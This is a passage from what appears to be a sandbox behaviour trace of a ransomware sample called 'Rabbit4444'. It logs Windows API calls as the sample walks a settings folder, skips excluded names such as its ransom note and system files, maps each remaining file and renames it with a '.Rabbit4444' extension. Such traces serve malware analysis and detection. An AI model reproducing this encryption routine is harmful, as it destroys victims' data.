lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.290] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x547f7839, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x547f7839, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x363, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", cAlternateFileName="CL16BA~1.SET")) returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2=".") returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="..") returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="windows") returned -1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="boot") returned 1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.291] lstrcmpiW (lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.291] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms" | out: lpString1="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms") returned="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms" [0059.291] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.291] lstrlenW (lpString="Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms") returned 64 [0059.291] lstrlenW (lpString="Rabbit4444") returned 10 [0059.291] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.291] lstrlenW (lpString=".dll") returned 4 [0059.291] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.291] lstrlenW (lpString=".lnk") returned 4 [0059.291] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.291] lstrlenW (lpString=".ini") returned 4 [0059.291] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.291] lstrlenW (lpString=".sys") returned 4 [0059.291] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.292] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.292] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15060253263) returned 1 [0059.292] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=867) returned 1 [0059.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.292] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0059.292] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x298 [0059.293] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x70000 [0059.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.294] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15060503078) returned 1 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0059.294] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.294] CloseHandle (hObject=0x298) returned 1 [0059.295] CloseHandle (hObject=0x278) returned 1 [0059.295] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms.Rabbit4444") returned 192 [0059.295] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.295] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x548901a7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x548901a7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", cAlternateFileName="CLC79C~1.SET")) returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2=".") returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="..") returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="windows") returned -1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="boot") returned 1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.298] lstrcmpiW (lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.299] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms" | out: lpString1="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms") returned="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms" [0059.299] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.299] lstrlenW (lpString="Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms") returned 64 [0059.299] lstrlenW (lpString="Rabbit4444") returned 10 [0059.299] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.299] lstrlenW (lpString=".dll") returned 4 [0059.299] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.299] lstrlenW (lpString=".lnk") returned 4 [0059.299] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.299] lstrlenW (lpString=".ini") returned 4 [0059.299] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.299] lstrlenW (lpString=".sys") returned 4 [0059.299] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.300] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.300] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15061031717) returned 1 [0059.300] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=843) returned 1 [0059.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0059.300] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x298 [0059.301] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0059.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.302] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15061280451) returned 1 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0059.302] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.302] CloseHandle (hObject=0x298) returned 1 [0059.302] CloseHandle (hObject=0x278) returned 1 [0059.302] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms.Rabbit4444") returned 192 [0059.302] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.303] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5494edb6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5494edb6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", cAlternateFileName="CLEF7F~1.SET")) returned 1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2=".") returned 1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="..") returned 1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="windows") returned -1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.303] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.304] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="boot") returned 1 [0059.304] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.304] lstrcmpiW (lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.304] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms" | out: lpString1="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms") returned="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms" [0059.304] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.304] lstrlenW (lpString="Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms") returned 64 [0059.304] lstrlenW (lpString="Rabbit4444") returned 10 [0059.304] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.304] lstrlenW (lpString=".dll") returned 4 [0059.304] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.304] lstrlenW (lpString=".lnk") returned 4 [0059.304] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.304] lstrlenW (lpString=".ini") returned 4 [0059.304] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.304] lstrlenW (lpString=".sys") returned 4 [0059.304] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.304] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a7160de5-e591-4d98-9bb0-0cac99d5f2d5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.305] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.305] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15061535654) returned 1 [0059.305] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=979) returned 1 [0059.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.305] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.306] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.307] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.307] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15061798537) returned 1 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.307] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.307] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.307] CloseHandle (hObject=0x298) returned 1 [0059.307] CloseHandle (hObject=0x278) returned 1 [0059.308] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms.Rabbit4444") returned 192 [0059.308] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a7160de5-e591-4d98-9bb0-0cac99d5f2d5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{a7160de5-e591-4d98-9bb0-0cac99d5f2d5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.309] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x549e7712, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x549e7712, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", cAlternateFileName="CL055D~1.SET")) returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2=".") returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="..") returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="windows") returned -1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="boot") returned 1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.309] lstrcmpiW (lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.309] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms" | out: lpString1="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms") returned="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms" [0059.309] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.309] lstrlenW (lpString="Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms") returned 64 [0059.309] lstrlenW (lpString="Rabbit4444") returned 10 